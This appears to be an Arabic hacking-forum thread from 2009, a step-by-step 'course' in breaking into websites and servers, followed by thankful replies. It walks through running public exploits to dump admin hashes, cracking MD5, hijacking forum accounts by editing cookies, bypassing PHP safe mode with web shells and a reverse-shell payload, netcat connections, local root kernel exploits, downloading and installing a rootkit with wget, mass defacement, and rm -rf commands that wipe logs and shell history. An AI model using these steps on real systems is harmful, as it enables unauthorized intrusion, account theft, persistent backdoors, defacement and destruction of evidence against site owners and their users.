لين يطلع مكأنآ
c:/
بعدين نشغل الثغره بالامر هذا perl
perl exploit.pl
لكي اسهل عليكم شرحتلكم بالصوره

يكون التطبيق على الموقع المصاب كذا
perl exploit.pl http://www.example.com/
وبيطلعلـك .. الادمن .. والباس مشفـر بمقيآس MD5
/
وفيه طريقه ثانيه لاستثمار هذا النوع من الثغره دون تثبيت البرنامج
بـأستخدـأم شل مرفوع على سيرفر لنكس
ترفـع الثغره الى اي مجلد ..
ويكون التطبيق بنفس الاوامر وفي مكان الاوامر ولازم يكون السيف مود اوف حتى تتمكن من تطبيق الاوامر
perl exploit.pl http://www.example.com/
/
استثمار الثغرات المكتوبة بالـPHP
التي تبدأ بـ
#!/usr/bin/php
ويلزمك هذا البرنامج appserv السيرفر الشخصي
حملوه من هذا الرابط
http://prdownloads.sourceforge.net/appserv/appserv-win32-2.5.9.exe?download
رابط الثغره :
http://www.milw0rm.com/exploits/2487
ننسخ الثغره في مفكره ونحفظها بامتداد .php
4images.php

ونضعه في الـ c
ونفـتـح الدوس
ونذهب لـمكآن الثغره
زي ماتعلمـت اول
ونشغل الثغره بهالامر
[IMG]file:///C:/********s%20and%20Settings/mohd/سطح%20المكتب/دورة%20بسيطه%20لاختراق%20المواقع%20والسيرفرات/دروس%20الدورة/images/10.JPG[/IMG]
نحصل على الاستغلال الي هو مقسم لقسمـين
php 4images.php domain.com /4images/ 4images_ 1
php 4images.php domain.com /4images/ -d
بدال كلمة domain.com تحط الموقع المصاب
نحط الاستغلال الاول ثـم الثاني
مع تغيير رابط الموقع المصاب
ويطلعلنا باسورد الادمن مشفر بمقيآس الـ MD5
/
استثمار الثغرات المكتوبة بالـ PythOn
التي تبدأ
#!/usr/bin/python
يلزمك هذآ البرنآمج
PythOn 2.4.3 مترجم ثغرات البايثون
حمله من الرابط هذا
http://www.python.org/ftp/python/2.4.3/python-2.4.3.msi
ننسخ الثغره في مفكره ونحفظه بامتداد .py
exploit.py
ونحطه في الـc
ثمـن نفـتح الدوس
ونذهب لمكان الثغره كما تعودنا في الـ c
ونشغل الثغره بهذي الطريقه
exploit.py
والاسغلال كذا
exploit.pyhttp://domain/path
http://domain/path << نبدله برابط الموقع المصاب مع تحديد مجلد السكربت
/
استثمار الثغرات المكتوبة بلغة الشيل
التي تبدأ
#!/bin/sh او #!/bin/bash ا
يلزمكسرفر لنكس (ShellAccount or Root)
لو كان في حوزتكم شل فلازم اكون يدعم الاتصال العكسي
مثلن هذا الثغره
http://www.milw0rm.com/exploits/4003
كود البحث في قوقل
inurl:index.php?option=com_philaform
تنسخ الثغره في مفكره وتحفظه بامتداد .sh
exploit.sh
ثم ترفعه على الشل ولازم ترفعه على مجلد تصريحه 777
ثم تصرح ملف 777 الثغره بالامر هذا
chmod 777 exploit.sh
ثمـن أمر التشغيل
./exploit.sh
وبالتالي الاستغلال هو :
exploit.sh www.example.com 2
http://www.example.com >> الموقع اللي مركب سكربت Joomla Component Phil-a-Form
2 >> الآي دي id حق الادمن وبتكون 2 افتراضيا
وبيطلعلك اليوزر .. والباس مشفر

AZOZ · 01-27-2009, 12:56 AM

#############################
تحرير الكوكيز & فك التشفير الـ MD5
#############################
فكـ التشفيـر ببرنآمج الـ cain
أول شـي بشفر الباسوورد 123456 إلى MD5
e10adc3949ba59abbe56e057f20f883e
تم التشفير
الآن نبغى نفكه
نفتح برنآمج Cain

ثمن نروح لـ

ثمـن نختآر

ثمـن نروح لـ

ثمـن نضـع الهآش ونضغط ok

فيه طريقتين لفـك التشفيـر .. عن طريق الورد لسـت .. وعن طريق التخميـن
طريقة الورد الست
نتبع الي بالصوره .. نضغط على Dictionary attack

بعدين نختار الورد لست تابع في الصوره

ملاحظه : البرنامج مرفق معه وورد لست جاهز مجأني

ثم نضغط على

وسوف يبدأ البرنآمج بفك التشفيـر
تـم فك التشفير
طالعو

طريقة التخميـن
نضيف الهآش كمآ بالخطوآت السآبقـه ..
ثـمـ(ن) نختار Brute-Force Attack

بيطلعلـك هألمربـع عأد انت اختار طرق التخميـن .. وأضغـط على Start

تحرير الكوكيـز
اول شي يلزمـك
برنأمج
****** Editor
ابحث عنه في قوقل تلقآهـ
<< سوداني ههههههههههههههه
يآطويلين العمر هذي افضل طريقـه من فكـ التشفيـر لانه تريحـك
تابعو معي
عندي باس مشفر Md5
لعضويه في منتدى معين
اسم العضويه : حصيصه ام قصيصه
الباس المشفر : 7dcdb4b307025a0ee407f239167b44d7
رقم العضويه : 20347
خلاص حلـوٍ
اول شي نسجل بالمنـتـدى
ثمـن نفتح البرنامج
وندور على رابط المنتدى
ونضغط ضغطتين على الباس المشفر ونحط باس العضويه الي تبي تدخل فيها وايضأ تبدل رقم العضويه بالعضويه الي تبيها

والافضل انك تخلي المنتدى بالصفحه الرئيسيه
تلقى نفسك داخل بالعضويه
شوفو كيف انا وش صار معي
دخلت بعضويه حصيصه ام قصيصه .. خخخخخخخخخخخخ

اتمنى تكونوا فهمتوا

إلى لقاء في الدرس القادم

AZOZ · 01-27-2009, 01:00 AM

#############################
الوضـع الآمــن Safe Mode ..
#############################
الوضع الامن : هي حآلـه السيرفر ..
في حآلـه الـ ON: لايمكـنـك تطبيق الاوامر ولا الاتصال بالسيرفر عن طريق النت كات ولا اخذ روت .. بمعنى اخر لايمكنك فعل شي بالسيرفر
في حآلـه الـ OFF : الي في راسـك سوٍهـ .. لا يوجـد شي يمنعـك .. ^_^
تهقون لمـآ يكون الحآلـه ON نترك الشـل ونرـوٍح .. لآ يوجـد عدة طرق لتخطـي الـ Safe Mode
كل فتره تنزل .. ثغره وطريقه لتخطي الـ Safe mode
وبشرح لكـم كم طريقه تجدونهآ في المرفقآت
الطريقه الاولى : ثغره في كل اصدارات PHP 4 تسمح لك بتخطي السيف مود وتطبيق الاوامر
الطريقه الثانيه : قرائه الملفآت عن طريق ثغرات الي بالسيرفر .. زي ثغره copy() & ini_restore() .. الخ بشـل Sniper_Sa
الطريقـه الثآلثـه : اقفال السيف مود عن طريق زرع ملف php.ini
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
ثغره في كل اصدارات PHP 4 تسمح لك بتخطي السيف مود وتطبيق الاوامر
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
هناك طريقتين للاستغلال من خلال الشل c99 او من خلال رفع ملف PHP على اي موقع
نشرح الثغره من خلال c99
بسم الله نبـدأ :
أول شـي نروح لهـآلموقـع :
http://metasploit.com:55555/PAYLOADS?MODE=SELECT&MODULE=%6c%69%6e%75%78%5f%69% 61%33%32%5f%72%65%76%65%72%73%65
ثمـن تضـع الـ ip تبعـك
والـ portالي تبي تتنصت عليه من النت كـآت
زي الي في الصوره

ثمـ(ن) تضغط علـى
Generate payload

ثمـ(ن) تنسخ المقطع الثاني من الصفحه حتى آخر فاصله الي قبل الاخيـر
زي الي في الصوره

وتضعه في الملف الي في المرفقات
bypass-safemode
مثل الي في الصوره

ثمـن تروح للنت كات وتتنصت على البورت الي حطيته
nc -vv -l -p 2121

ثمـ(ن) تروح للشـيل c99
لخـآصيـه PHP CODE

وتلصـق الكود الي نسخته في المربع
وتضغط على
Execute
مثل الي في الصوره

ثمن تروح للنت كات تلقى نفسك متصل بالسيرفر وتخطيت السيف مود

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
اقفال السيف مود عن طريق زرع ملف php.ini
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
مابي اقرقر كثيـر .. ^_^ شوفو الصوـره

بس سـوٍ إنشـآء .. بعديـن سوٍ تحديـث للصفحـه .. ويطلعلكـ السيف مود غير فعآل ..
ملاحظه : هذاكلـه في شـل sniper_sa 2
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
قرائه الملفآت عن طريق ثغرات الي بالسيرفر .. زي ثغره copy() & ini_restore() .. الخ بشـل Sniper_Sa
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
الحين معنا شل والسيف مود on وسطر الاوامر مختفـي .. لحمآيـه السيرفر
بسيطـه .. اكتشفت ثغرات في الدوال زي داله الـ system الي شغلتها تنفيذ الاوامر في السيرفر
وعن طريق هذه الثغره يمكننا .. تنفيذ الاوامر ويوجد ايضاً دوال مصابه اخرى في شل السنايبر 2
انظرو الصورة واظن كل شي وأضـح اختر الداله المصابه ونفذ الامر ..

وايضاً يمكنك قرائه الملفات عن طريق دوال اخرى مصابه ..
ناظرو الصورة ..

الحين انتهينا من الدوال
بقـي ثغرات برنامج الـphp
االحيـن نبي نقرا ملف الكونفـق .. ومـآنقـدر ننفذ امر قرائه هذا الملف اصلـن بالمره سطر الاوامر لايوجد
كييييف
انا اقولكـم .. يوجد ثغرات اكتشفت في برنامج الـphp حق السيرفر .. ومنها نقدر نستعرض اي ملف ..
ناظرو الصوره وبتفهمون .. ^_^

جرب لكل ثغره اذا مانفع معك جرب الثانيه .. ويوجد ثغرات اخرى برضوه في الشل
ملاحظه : هذاكلـه في شـل sniper_sa 2
#################################################

AZOZ · 01-27-2009, 01:02 AM

#############################
تخطي صلاحيه اليوزر
#############################
كما علمنا ان صلاحية اليوزر محدوده للموقع الي انت عليه ولا يسمح لك بالانتقال الى المواقع الاخرى ولا تصفحها
واذا كانت صلاحيتك يوزر خلاص بتتركه .. لا ياحلـــوٍ

فيه عدة طرق لتخطي اليوزر
ولكن انا اخترت لكم افضل طريقة
الي هي
شل مطور مخصص لتخطي اليوزر ..
يعني ترفعه وتستعرضه .. فقـط .. !!
هو زي الشل العادي
والشل تلقاه مع الشرح
شوفو صلاحيتنا يوزر
uid=32187(cravin3) gid=32188(cravin3) groups=32188(cravin3)

يالله خلنا نرفع الشل ثم نستعرضه
انا رفعته خلاص .. ^_^ c99.php
الحين عندنا كونفق حق منتدى على موقع ثاني ونبي نقراه يالله نشوف كيف
نروح لـ : Go File ::
/home/bygosh2/public_html/foxfire-farms/forum/config.php

شفتو كيف الدعوه سهله .. ^_^

الشل في المرفقات

أنتـهى الشـرح

#################################################

AZOZ · 01-27-2009, 01:04 AM

#############################
الـروت وكل مايتعلـق بووهـ ..
#############################
زي ما اننا عآرفين ان صلاحية الروت هي الي تتحكم بالسيرفر كامل بجميع مواقعه
والحين نبي نعرف كيف بنحصل على صلاحية الروت .. عشآن نسيطر على السيرفر كآمل ..
توجد عدة طرق للحصول على الروت :
1) عن طريق اللوكال روت و هو استغلال لتغرة بكيرنل السيرفر

2) عن طريق استغلالات لتغرات البرامج المركبة على السيرفر

3) عن طريق قراءة بعض الملفات التي يكون فيها باسوورد الرووت
#############################
الحصول على الروت عن طريق اللوكال رووت
الطــرق :-
الأتصآل بالسيرفر عن طريق النت كات
الحصول على الروت
تثبيت الروت كيت على السيرفر
عمل ماس ديفاس
مسح الاثآر من السيرفر
#############################
مآهو اللوكآل روت .؟
اللوكآل ياطويلين العمر هو برنامج مبرمج لاستغلال ثغره باصدار الكيرنل
واللوكالات مبرمجه بلغه السي C فتحتاج إلى ترجمة قبل التشغيل
وهذا امر الترجمه بعد رفع اللوكال الى السيرفر عن طريق الشل
ثم تنفذ هذا الامر
gcc local.c -o local
كيف أعرف ان اللوكآل مترجم او غير مترجم ؟
اذا كان امتداده C فهذا غير مترجم .. اما اذا كان غير ذلك فهو مترجم
موقع تفيدك في البحث عن اللوكلات
milw0rm.com/local.php
kernel.org/pub/linux
securityfocus.com
او عن طريق محركات البحث
local root exploit 2.6.9-22
###########
الحين عرفنا كل شي عن اللوكال بقى الحين كيف نحصل على الروت من اللوكال هذا
قبل لاترفع اللوكال يجب ان تكون متصل بالسيرفر
ثمن نرفع اللوكال على السيرفر في مجلد يحمل التصريح 777
اذا كان غير مترجم نعطية تصريح 777 بالامر
chmod777local.c
و من ثم نترجمه بالامر
gcc local.c -o local
ثم نعطي الملف الجديد المترجم تصريح 777 بالامر
chmod 777 local
و في النهاية نشغله بالامر
./local

اذا كان مترجم جاهز نكتفي باعطائه تصريح 777
بالامر
chmod777local
ثم نشغله بهالامر
./local
بعد التشغيل
ننفذ هالامر
id
نشوف صلاحيتنا طلعت روت

ثم ننفذ هالامر
su
للحصول على روت كامل

/
الأتصآل بالسيرفر عن طريق النت كات
هناك طريقتين للاتصال بالسيرفر
الاتصال العكسي : انك تتنصت ببورت على جهازك عن طريق النت كات واذا كنت في شبكه لازم تفتح بورت في الراوتر وتسوي اتصال عكسي
يعني تخلي السيرفر يتصل بك هذا يسمى اتصال عكسي
تابعو مـعـي كيف نتصل بالسيرفر
أول شـي ترووح تتنصت على اي بورت تبيه
nc -v -l -p port
port : البورت الي تبي تتنصت عليه

ثمن تروح للشـيل .. بالاسفل

بعدين تضغط على أتصال
ترجع للنت كات تلقى نفسك متصل بالسيرفر ويمكنك من تطبيق الاوامر ..
###########
الاتصال العادي : هو انك تفتح بورت في السيرفر وتتصل به عن طريق النت كات وهذا الاسهل .. لانه مايحتاج فتح بورت في الراوتر
اول شي تروح للشـل .. بالاسفل

ثمـن تطلع اي بي السيرفر
من الدوس
ping www.??????.com
?????? : حط الموقع الي رافع عليه الشل او اي موقع على السيرفر

ثمـن تروح للنت كات وتكتب الامر
nc -v -n ipserverport
ipserver : بدله بـ اي بي السيرفر الي طلعته من الدوس
port : البورت الي فتحته في السيرفر
ثمـن اضغط انتر
وروح للشـل واضغط على فتـح
ارجع للنت كات تلقى نفسك متصل بالسيرفر ويمكنك من تطبيق الاوامر ..
###########
الحصول على الروت
طبعاً زي ماقلنا فوق
توجد عدة طرق للحصول على الروت :
1) عن طريق اللوكال روت و هو استغلال لتغرة بكيرنل السيرفر

2) عن طريق استغلالات لتغرات البرامج المركبة على السيرفر

3) عن طريق قراءة بعض الملفات التي يكون فيها باسوورد الرووت
######################
1) عن طريق اللوكال روت و هو استغلال لتغرة بكيرنل السيرفر
######################
اذا بدك تاخذ رووت تـآبـع معـآي شو عـم بسوي << قلب سوري خخخخ
لنفترض الحين متصلين بالسيرفر عن طريق النت كات
نرفع اللوكال على السيرفر في مجلد يحمل التصريح 777
اذا كان غير مترجم نعطية تصريح 777 بالامر
chmod777local.c
و من ثم نترجمه بالامر
gcc local.c -o local
ثم نعطي الملف الجديد المترجم تصريح 777 بالامر
chmod 777 local
و في النهاية نشغله بالامر
./local

اذا كان مترجم جاهز نكتفي باعطائه تصريح 777
بالامر
chmod777local
ثم نشغله بهالامر
./local
بعد التشغيل
ننفذ هالامر
id
نشوف صلاحيتنا طلعت روت

ثم ننفذ هالامر
su
للحصول على روت كامل

تثبيت الروت كيت على السيرفر
الحين حصلنا على روت الحمدلله
ومسيطيرين على السيرفر .. صاحب السيرفر طبعاً بيشوف سيرفره اخترق اكيد بيحذف الشلات بيغلق الثغرات بيحدث الكيرنل
يعني مافي امل نرجـع .. بس خلك ذكي من اولها ثبت روت كيت على سيرفر عشان لو مره ثانيه بترجع بصلاحية روت بإذن الله
ماهو الروت كيت ؟
الرروت كيت : يفتح منفد بالسيرفر و يضيف يوزر بصلاحيات الرووت لضمان رجوعنا للسيرفر مره اخرى
في شرحي هذا بستعمل روت كيت اسمه shv5-rootkit
لكي نثبت الروت كيت نفعل الآتي :
نسحب الروت كيف على اي مكان بالسيرفر بالامر هذا
wgethttp://hack-mix.com/tools/shv5-rootkit.zip
انتبه ترا الروت كيت الي سبحناه مضغوط
يعني نفك ضغطه بالامر هذا
unzip shv5-rootkit.zip
بعد فك الضغط بتشوف مجلد اسمه shv5
تدخل عليه بالامر هذا
cd shv5
ثمن تشوف المجلد يحتوي على ملفات
نعطي الملف هذا setup تصريح 777
طبعا بيكون شكل الامر كذا
cmod777 setup
الحين بقى التشغيل بالامر هذا
./setup password port

اي باسوورد نبغي password

نضع رقم البورت اللي نبغى نتصل عليه بعد تركيب الرروت كيت port
انتظر شوي لين ينتهي عمل الروت كيت
لنفترض الحين ثبتنا الروت كيت ونبي نتصل بالسيرفر بصلاحية الروت
يتم ذلك ولكن اغلب الي يستخدمونه برنامج putty :
تبي البرنامج حمله من الرابط هذا
http://hack-mix.com/tools/putty.rar
ثمـن نشغلـه

بعدين بتطلعلك شاشه سوداء
اكتب اليوزر = root
الباسوورد = الي كتبته اثناء تركيب الروت كيت
ملاحظه : عند كتابة الباسوورد ما يظهرلك الارقام الي كتبتها .. لاتحسب ان كيبوردك خربان .. زي بعض الناس خخخخخخخخ
بعدين اتصل ..
عمل ماس ديفاس
الماس ديفاس : هو تغيير جميع اندكسات المواقع الي على السيرفر .. حتى لو الاندكس مجلد في مجلد
الحين نفترض انك مخترق سيرفر وتبي تغير اندكسات المواقع
والسيرفر عليه 100 موقع صعبه انك تدخله موقع موقع وتغير اندكساتهم
هذه الاداه تغنيك عن هذا التعب .. يريحك و في وقت قصير
وهو سكربت مبرمج بلغه البيرل
الحين نشوف كيف نشغله
اول شي تسحب الملف لاي مكان بالسيرفر
wgethttp://hack-mix.com/tools/mass.zip
نفك الضغط
unzip mass.zip
نشغل الاداه الحين
perl mass.pl

بيطلعلنا كذا يعلمنا كيف نستخدم الاداه

musage : perl mass.pl <path too u're index>
mexample : perl mass.pl /tmp/index.html

<path too u're index المكان اللي رافعين عليه الاندكـس حقنا

الان نسحب الاندكس على السيرفر على مجلد tmp حتى يبقى امر التشغيل سهل علينا

بعد دلك نشغل السكريبت بامر التشغيل و ننتظر

perl mass.pl /tmp/index.html

ملاحظه : كلما زاد عدد المواقع كل ما اخذ وقت تشغيل الاداه ورفع الاندكسـآت
واذا تبي تعرف المواقع الي على السيرفر
http://whois.webhosting.info/ip
ip =هنا اي بي السيرفر
مسح الاثآر من السيرفر
الحين عقب مارفعت صفحة الاختراق حقتك على المواقع
وخلاص تبي تطلع من السيرفر
لاتنسى شي مهم انك تمسع ملفات اللوق تبع السيرفر
لان اي واحد يدخل السيرفر يتخزن الاي بي حقه في ملفات اللوق تبع السيرفر
يعني لو تجاهلتها ماتدري الا بكرا العصر يدقون عليك الباب خخخخخخخخخخخ
الحين عليك انك تمسح ملفات اللوق وهذه الاوامر لمسحها كلها ولا يبقى لك اثر في السيرفر بإذن الله
rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;
كذا انت مسحت جميع الاثار
#################################################

بهذا نكون قد أنهينا هذه الدورة

ملاحظة : تم نقل هذه الدورة من أجل الفائدة لأعضاء الشبكه العنكبوتيه

ويوجد كتاب لهذه الدورة سوف يتم رفعه لكم

إلى اللقاء في دورة أخرى بغذن الله تعالى

AbO-Ra3d · 01-27-2009, 12:13 PM

يعني بصراحة شرح أفضل من رائــــــــــــع
شرح وافي وكامل بارك الله فيك
أتشرف أن أكون أول من أضع ردا على الموضوع الرائــــــــــــــع

AbO-Ra3d · 01-27-2009, 12:17 PM

يثبت وبقوة

Cyber Code · 01-27-2009, 02:11 PM

الف شكر لك والله دور كامله
واصل ابداعك
------------------------------------------------------------------
شكراشكراشكراشكراشكرابطلقناص
================================================== =======
شرف لي اكون ثاني شخص يرد على موضوعك

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
دورة متكاملة فى اختراق المواقع والسيرفرات (فيديو ) قوية جدا	sniper07	قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات	27	11-05-2015 05:48 PM
[ أضخم دورة لتعليم أختراق المواقع والسيرفرات + شرح بالفيديو + صور]	D-GhosT s3cur!Ty-Z	قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات	17	11-05-2015 05:48 PM
دورة No-hack.fr لاختراق المواقع والسيرفرات حتى الاحتراق	DannY.IraQi	قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات	238	02-02-2015 09:16 PM
دورة الاخ DarkMaSTer في اختراق المواقع والسيرفرات	ksa.hail	قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات	4	06-29-2010 11:38 PM

دورة مبسطة في اختراق المواقع والسيرفرات

قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات